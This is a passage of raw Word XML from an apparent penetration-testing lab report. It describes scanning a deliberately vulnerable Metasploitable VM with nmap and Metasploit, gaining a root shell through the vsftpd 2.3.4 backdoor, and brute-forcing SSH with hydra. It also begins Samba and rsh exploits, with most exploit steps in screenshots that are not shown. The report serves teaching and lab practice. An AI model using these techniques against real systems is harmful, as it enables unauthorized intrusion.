      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00683E25">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00683E25">
        <w:t xml:space="preserve"> for example.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E69C9B" w14:textId="733FC642" w:rsidR="00683E25" w:rsidRDefault="00683E25" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="403067AA" w14:textId="77777777" w:rsidR="00683E25" w:rsidRDefault="00683E25" w:rsidP="00683E25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00683E25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CONCURRENCY</w:t>
      </w:r>
      <w:r>
        <w:t>: Number of targets to be scanned simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C05B0AA" w14:textId="77777777" w:rsidR="00683E25" w:rsidRDefault="00683E25" w:rsidP="00683E25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00683E25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PORTS</w:t>
      </w:r>
      <w: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Default="00683E25" w:rsidP="00683E25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00683E25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RHOSTS</w:t>
      </w:r>
      <w:r>
        <w:t>: Target or target network to be scanned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DB128D" w14:textId="260C3857" w:rsidR="003A7FDF" w:rsidRDefault="00683E25" w:rsidP="00683E25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00683E25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>THREADS</w:t>
      </w:r>
      <w:r>
        <w:t>: Number of threads that will be used simultaneously. More threads will result in faster scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E98B88" w14:textId="119ABE12" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="787A6DF6" w14:textId="30001755" w:rsidR="003A7FDF" w:rsidRDefault="00B52B60" w:rsidP="00B52B60">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8BEB5A" w14:textId="5BFA61E6" w:rsidR="00B52B60" w:rsidRDefault="00B52B60" w:rsidP="00B52B60">
      <w:r>
        <w:t>We can connect Metasploit to a database to store our researching finds. First, we need to start the system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680A67ED" w14:textId="20B64755" w:rsidR="00B52B60" w:rsidRDefault="00B52B60" w:rsidP="00B52B60">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B52B60">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B52B60">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B52B60">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0BDB5AD4" w14:textId="4F5F4E38" w:rsidR="00B52B60" w:rsidRDefault="00B52B60" w:rsidP="00B52B60">
      <w:r>
        <w:t xml:space="preserve">then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1648AA37" w14:textId="6FC167FF" w:rsidR="00B52B60" w:rsidRDefault="00B52B60" w:rsidP="00B52B60">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B52B60">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>msfdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B52B60">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B52B60">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69BF9EEA" w14:textId="0D127223" w:rsidR="00B52B60" w:rsidRDefault="00B52B60" w:rsidP="00B52B60">
      <w:r>
        <w:t xml:space="preserve">Now, we are ready to launch </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B52B60">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17B1699B" w14:textId="469D75F5" w:rsidR="00B52B60" w:rsidRDefault="00B52B60" w:rsidP="00B52B60">
      <w:r>
        <w:t>Let’s check the database status:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C31B23" w14:textId="1D6452EA" w:rsidR="00B52B60" w:rsidRPr="00B52B60" w:rsidRDefault="00B52B60" w:rsidP="00B52B60">
      <w:r>
        <w:rPr>
          <w:noProof/>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B52B60" w:rsidRDefault="00B52B60" w:rsidP="00B52B60"/>
    <w:p w14:paraId="2DD5112C" w14:textId="777ECF6D" w:rsidR="003A7FDF" w:rsidRDefault="00357D55" w:rsidP="00B83FB4">
      <w:r>
        <w:t xml:space="preserve">We can save the results of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E88E92" w14:textId="32228A61" w:rsidR="00357D55" w:rsidRDefault="00357D55" w:rsidP="00B83FB4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00357D55">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>db_nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00357D55">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00357D55">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00357D55">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- TARGET_IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722388E5" w14:textId="5847BB57" w:rsidR="00281764" w:rsidRDefault="00281764" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="52EAE613" w14:textId="18894F35" w:rsidR="00281764" w:rsidRDefault="00281764" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="66B051BC" w14:textId="77777777" w:rsidR="00281764" w:rsidRDefault="00281764" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="64044104" w14:textId="2860295D" w:rsidR="00357D55" w:rsidRDefault="008707FC" w:rsidP="00B83FB4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>I tried this command against my OSSEC server, and this is the response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1F935B" w14:textId="32A9AB6F" w:rsidR="008707FC" w:rsidRDefault="00281764" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="35BA58A7" w14:textId="27572400" w:rsidR="003A7FDF" w:rsidRDefault="002E1BFE" w:rsidP="00B83FB4">
      <w:r>
        <w:t xml:space="preserve">Now I can use commands </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1BFE">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>hosts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1BFE">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>services</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to view the saved information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550CE359" w14:textId="77777777" w:rsidR="002E1BFE" w:rsidRDefault="002E1BFE" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="00FF69B0" w14:textId="618636FD" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="74F86EA3" w14:textId="214E6800" w:rsidR="003A7FDF" w:rsidRDefault="005625E6" w:rsidP="005625E6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc115553365"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="57F8964D" w14:textId="1FAD9006" w:rsidR="005625E6" w:rsidRDefault="005625E6" w:rsidP="005625E6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a system that offers vulnerable servers. I will be testing this system using Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607AFB56" w14:textId="49A43480" w:rsidR="005625E6" w:rsidRDefault="005625E6" w:rsidP="005625E6">
      <w:r>
        <w:t xml:space="preserve">First, I need to download the server as a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vmware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7EE0CD" w14:textId="4CEBEFE9" w:rsidR="005625E6" w:rsidRPr="005625E6" w:rsidRDefault="005625E6" w:rsidP="005625E6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>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Default="005625E6" w:rsidP="00B83FB4">
      <w:r>
        <w:t>After downloading it and extracting it, I can open it using VMware workstation pro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0311B384" w14:textId="1B585C33" w:rsidR="005625E6" w:rsidRDefault="005625E6" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="016648B4" w14:textId="4BFFD936" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="313CD2D2" w14:textId="1B55E5D4" w:rsidR="003A7FDF" w:rsidRDefault="005625E6" w:rsidP="00B83FB4">
      <w:r>
        <w:t xml:space="preserve">Username: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39BD40C7" w14:textId="66026B69" w:rsidR="005625E6" w:rsidRDefault="005625E6" w:rsidP="005625E6">
      <w:r>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05DF767C" w14:textId="15E507D1" w:rsidR="005625E6" w:rsidRDefault="005625E6" w:rsidP="005625E6"/>
    <w:p w14:paraId="4C75CBE9" w14:textId="5E1C7E9D" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="06322621" w14:textId="77AD3A88" w:rsidR="003A7FDF" w:rsidRDefault="005625E6" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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Default="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="66A1C1E1" w14:textId="5D755BB4" w:rsidR="003A7FDF" w:rsidRDefault="005625E6" w:rsidP="00B83FB4">
      <w:r>
        <w:t xml:space="preserve">I got </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address which is 192.168.49.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4BDFFB" w14:textId="73CA62E1" w:rsidR="005625E6" w:rsidRDefault="005625E6" w:rsidP="00B83FB4">
      <w:r>
        <w:t>Now let me launch my Kali machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36404594" w14:textId="59D777BD" w:rsidR="005625E6" w:rsidRDefault="00E648CF" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>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Default="00E648CF" w:rsidP="00B83FB4">
      <w:r>
        <w:t>Let me ping to the server to check connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF4D6BD" w14:textId="65CEE135" w:rsidR="00E648CF" w:rsidRDefault="00E648CF" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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Default="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="2F1A62A7" w14:textId="46B9F9FB" w:rsidR="003A7FDF" w:rsidRDefault="00E648CF" w:rsidP="00B83FB4">
      <w:r>
        <w:t xml:space="preserve">Now everything is set up. I will use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to get information about the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B7E79A" w14:textId="4A7CB2A8" w:rsidR="00E648CF" w:rsidRDefault="00E648CF" w:rsidP="00B83FB4">
      <w:r>
        <w:t xml:space="preserve">To make it easier I will use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zenmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the graphical interface for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDEA3FC" w14:textId="2AC02E36" w:rsidR="00E648CF" w:rsidRDefault="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="29B98FA1" w14:textId="2045556D" w:rsidR="00B81261" w:rsidRDefault="00B81261" w:rsidP="00B81261">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability One</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEB02F4" w14:textId="77777777" w:rsidR="00B81261" w:rsidRPr="00B81261" w:rsidRDefault="00B81261" w:rsidP="00B81261"/>
    <w:p w14:paraId="3353E9C5" w14:textId="6381D3A2" w:rsidR="00E648CF" w:rsidRDefault="00E648CF" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>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Default="00E648CF" w:rsidP="00E648CF">
      <w:r>
        <w:t xml:space="preserve">I put the target’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> using intense scan and got this response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC0AA97" w14:textId="61BB509D" w:rsidR="00E648CF" w:rsidRDefault="00E648CF" w:rsidP="00E648CF">
      <w:r>
        <w:t xml:space="preserve">For now, I care about the open port which is 21 as you can see. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A106F86" w14:textId="546F65E4" w:rsidR="00E648CF" w:rsidRDefault="00E648CF" w:rsidP="00E648CF">
      <w:r>
        <w:t>I can google the version to get vulnerabilities that I can use against it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A4C374" w14:textId="6092DF79" w:rsidR="00E648CF" w:rsidRDefault="00467F20" w:rsidP="00E648CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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Default="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="73D70659" w14:textId="25310C9D" w:rsidR="00E648CF" w:rsidRDefault="00467F20" w:rsidP="00B83FB4">
      <w:r>
        <w:t>I found this vulnerability on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BDBA79" w14:textId="745046F1" w:rsidR="00467F20" w:rsidRDefault="00000000" w:rsidP="00B83FB4">
      <w:hyperlink r:id="rId132" w:history="1">
        <w:r w:rsidR="00467F20" w:rsidRPr="00191C07">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64236655" w14:textId="65995A19" w:rsidR="00467F20" w:rsidRDefault="00467F20" w:rsidP="00B83FB4">
      <w:r>
        <w:t>I can run it exactly as it is using Metasploit (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47224F7E" w14:textId="269F41D9" w:rsidR="00467F20" w:rsidRDefault="00072369" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>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Default="00072369" w:rsidP="00B83FB4">
      <w:r>
        <w:t>I got inside the server shell, and I can execute any command as root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00105887" w14:textId="77777777" w:rsidR="00072369" w:rsidRDefault="00072369" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="4A5EA21A" w14:textId="2B7D9BC2" w:rsidR="00E648CF" w:rsidRDefault="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="0CCD32ED" w14:textId="5EF4DF67" w:rsidR="00E648CF" w:rsidRDefault="00072369" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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Default="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="6B01197F" w14:textId="243C1579" w:rsidR="00E648CF" w:rsidRDefault="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="0EC25BB8" w14:textId="7ABB566D" w:rsidR="00B81261" w:rsidRDefault="00B81261" w:rsidP="00B81261">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability Two</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEF9598" w14:textId="6E5D410C" w:rsidR="00B81261" w:rsidRDefault="008B50C8" w:rsidP="00B81261">
      <w:r>
        <w:t xml:space="preserve">We can also exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vulnerability if we know the server’s username and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A956080" w14:textId="2C5D67C3" w:rsidR="008B50C8" w:rsidRDefault="008B50C8" w:rsidP="00B81261">
      <w:r>
        <w:t xml:space="preserve">I know it is difficult to have the username and password, but I might need it. Plus, I can use </w:t>
      </w:r>
      <w:r w:rsidRPr="008B50C8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16625FFE" w14:textId="34B3BD3B" w:rsidR="008B50C8" w:rsidRDefault="008B50C8" w:rsidP="00B81261">
      <w:r>
        <w:t>to brute force the server to get the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6F3D33" w14:textId="627B7535" w:rsidR="008B50C8" w:rsidRPr="00B81261" w:rsidRDefault="008B50C8" w:rsidP="00B81261">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>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Default="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="4E6B6733" w14:textId="0962EEFD" w:rsidR="00B763FF" w:rsidRDefault="00B763FF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="3377231F" w14:textId="7C8B337A" w:rsidR="00B763FF" w:rsidRDefault="00B763FF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="0342B9A6" w14:textId="31D8BF31" w:rsidR="00B763FF" w:rsidRDefault="00B763FF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="632B82E2" w14:textId="1748FEE8" w:rsidR="00B763FF" w:rsidRDefault="00B763FF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="6667C5D9" w14:textId="361DFF2F" w:rsidR="00B763FF" w:rsidRDefault="00B763FF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="37D37063" w14:textId="458B564A" w:rsidR="00B763FF" w:rsidRDefault="00B763FF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="0D7A23F0" w14:textId="77777777" w:rsidR="00B763FF" w:rsidRDefault="00B763FF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="6BED014F" w14:textId="36057E23" w:rsidR="00B763FF" w:rsidRDefault="00B763FF" w:rsidP="00B763FF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability Three</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC4D411" w14:textId="06303A31" w:rsidR="00B763FF" w:rsidRDefault="00B763FF" w:rsidP="00B763FF">
      <w:r>
        <w:t>The third vulnerability I want to exploit is Samba:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03350E25" w14:textId="2B70CD76" w:rsidR="00B763FF" w:rsidRPr="00B763FF" w:rsidRDefault="00B763FF" w:rsidP="00B763FF">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="27280214" w14:textId="1FBACA94" w:rsidR="00E648CF" w:rsidRDefault="00B763FF" w:rsidP="00B83FB4">
      <w:r>
        <w:t>First, I google it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFA5752" w14:textId="3F9C5143" w:rsidR="00607548" w:rsidRDefault="00607548" w:rsidP="00B83FB4">
      <w:r>
        <w:t>I found this link:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE65D9D" w14:textId="236053BE" w:rsidR="00607548" w:rsidRDefault="00607548" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>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Default="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="0AC6F68F" w14:textId="0DED735D" w:rsidR="00607548" w:rsidRDefault="00607548" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="696F7F17" w14:textId="756B7A0E" w:rsidR="00607548" w:rsidRDefault="00607548" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="37367016" w14:textId="3E76BF5A" w:rsidR="00607548" w:rsidRDefault="00607548" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="6C97C4D9" w14:textId="15679AEB" w:rsidR="00607548" w:rsidRDefault="00607548" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="42AED401" w14:textId="480811C4" w:rsidR="00607548" w:rsidRDefault="00607548" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="789E5927" w14:textId="6DCF1BE9" w:rsidR="00607548" w:rsidRDefault="00607548" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="3D6EA578" w14:textId="58CEAEC1" w:rsidR="00607548" w:rsidRDefault="00607548" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="0C130ADE" w14:textId="51949793" w:rsidR="00607548" w:rsidRDefault="00607548" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="1EBA9755" w14:textId="77777777" w:rsidR="00607548" w:rsidRDefault="00607548" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="69EC1FFC" w14:textId="1DA89698" w:rsidR="00607548" w:rsidRDefault="00607548" w:rsidP="00B83FB4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Inside, it has these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A61697" w14:textId="400B1BE2" w:rsidR="00607548" w:rsidRDefault="00607548" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="00607548" w:rsidP="00B83FB4">
      <w:r>
        <w:t>I can launch Metasploit on Kali and type these steps and be able to get in the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510D206E" w14:textId="50EE1817" w:rsidR="00607548" w:rsidRDefault="00926F5F" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:noProof/>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24F0C2A8" w14:textId="68C0BD70" w:rsidR="00E648CF" w:rsidRDefault="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="453052F2" w14:textId="69EADEE9" w:rsidR="002238B5" w:rsidRDefault="002238B5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="7276780B" w14:textId="45E83150" w:rsidR="002238B5" w:rsidRDefault="002238B5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="77B89284" w14:textId="7ED9C497" w:rsidR="002238B5" w:rsidRDefault="002238B5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="0357D1C4" w14:textId="5B16F7E3" w:rsidR="002238B5" w:rsidRDefault="002238B5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="1B309556" w14:textId="31DDBDDD" w:rsidR="002238B5" w:rsidRDefault="002238B5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="22C994EA" w14:textId="2A628F61" w:rsidR="002238B5" w:rsidRDefault="002238B5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="222342D3" w14:textId="3DC7502D" w:rsidR="002238B5" w:rsidRDefault="002238B5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="225B98AE" w14:textId="2EFD05E2" w:rsidR="002238B5" w:rsidRDefault="002238B5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="3BD76B32" w14:textId="77777777" w:rsidR="002238B5" w:rsidRDefault="002238B5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="6ADE5BF5" w14:textId="6324727F" w:rsidR="002238B5" w:rsidRDefault="002238B5" w:rsidP="002238B5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability Four</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08496F58" w14:textId="0A1767EC" w:rsidR="002238B5" w:rsidRPr="002238B5" w:rsidRDefault="002238B5" w:rsidP="002238B5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002238B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Netkit-rsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002238B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1636D576" w14:textId="3EFA7CBC" w:rsidR="00E648CF" w:rsidRDefault="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="2A901463" w14:textId="5F30A898" w:rsidR="002238B5" w:rsidRDefault="002238B5" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="002238B5" w:rsidP="002238B5">
      <w:r>
